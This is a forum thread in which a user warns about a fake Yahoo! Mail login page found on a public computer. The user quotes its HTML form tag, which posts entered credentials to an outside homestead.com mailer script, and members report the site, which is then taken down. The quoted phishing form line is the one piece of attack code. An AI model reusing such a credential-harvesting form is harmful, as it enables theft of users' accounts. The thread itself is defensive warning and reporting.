Yahoo! Mail bogus Web Page
Results 1 to 5 of 5

Thread: Yahoo! Mail bogus Web Page

  1. #1
    Senior Member
    Join Date
    Jan 2005
    Posts
    217

    Yahoo! Mail bogus Web Page

    Yahoo! Mail bogus Web Page

    Beware of bogus websites in public computers!

    I donít actually know where to put this question, please move it if it should not be here.

    In the cafť, someoneís had been playing with the Homepage and I came across to a BAD URL that seems to be an exact replica of http://mail.yahoo.com.

    Itís an online account stealer/keylogger, I think (whatever we can call it). Going to the page, itís the EXACT image of the Yahoo! Mail page.

    Being aware of the tricks that a Web page can do, I donít login on it since the address bar shows a different URL (rather than starting with http://mail.yahoo.comÖ). I checked the source of the page and its form is pointing to a different URL

    <FORM METHOD="Post" ACTION="http://hotmail.homestead.com/~site/Scripts_ElementMailer/ElementMailer.dll" target=_top">

    Weird and bogus (because of the ďhotmailĒ word), instead of the normal that supposed to be:

    <form method=post action="https://login.yahoo.com/config/login?d3epbmscrqbo1" autocomplete=off name=login_form onsubmit="return hash(this,'http://us.rd.yahoo.com/reg/login0/no_suli/login/us/ym/*http://login.yahoo.com/config/login')">

    Further, this is where my question goes; I checked my cache but could not find this DLL file. I am trying to download the said DLL file from the URL to have someone examine it but it seems to be available online only. Iíve also tried to trace other pages from the homestead.com but could not yet find any trace (as of this time).

    Anybody who can check this DLL file and could give warning of what its capabilities (harmful, I guess), would be highly appreciated.

    And anybody who dare wants to check the URL (bogus Yahoo! Mail), please PM me.

    Advance thanks!

    Yo!
    \"Life without FREEDOM is no life at all\". - William Wallace
    MyhomE MyboX StealtH (loop n. see loop.)
    http://www.geocities.com/sebeneleben/SOTBMulti.gif

  2. #2
    ********** |ceWriterguy
    Join Date
    Aug 2004
    Posts
    1,608
    What was the offending url? Did you report it to the folks at Yahoo! in addition to warning us off about it?
    Even a broken watch is correct twice a day.

    Which coder said that nobody could outcode Microsoft in their own OS? Write a bit and make a fortune!

  3. #3
    Senior Member
    Join Date
    Jan 2005
    Posts
    217

    not yet

    I did not report it yet.
    \"Life without FREEDOM is no life at all\". - William Wallace
    MyhomE MyboX StealtH (loop n. see loop.)
    http://www.geocities.com/sebeneleben/SOTBMulti.gif

  4. #4
    ********** |ceWriterguy
    Join Date
    Aug 2004
    Posts
    1,608
    Thanks for the URL - I took the liberty of forwarding it to both Yahoo and Geocities (since the scam site is hosted there for those of you who've been keeping up with this from afar). Hopefully the offending site will be force closed today. I'd suggest you do the same - the squeekiest wheel tends to get fixed first.
    Even a broken watch is correct twice a day.

    Which coder said that nobody could outcode Microsoft in their own OS? Write a bit and make a fortune!

  5. #5
    Senior Member
    Join Date
    Jan 2005
    Posts
    217

    Well then, it's down already

    OK, well then, it's down already.

    And I think the source for the DLL is also down.

    Thanks for the efforts, |3lack|ce

    I hope anything like this phishing strategy would be stopped before it gets the wide public.

    BTW, Googling for the word "Fake Yahoo mail", I have read something here which is familiar to what I had found out, and it says some important points like what I did and what |3lack|ce had suggested. Read some here - http://www.helpbytes.co.uk/fake_login.php

    Thanks again |3lack|ce


    Yo!
    \"Life without FREEDOM is no life at all\". - William Wallace
    MyhomE MyboX StealtH (loop n. see loop.)
    http://www.geocities.com/sebeneleben/SOTBMulti.gif

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •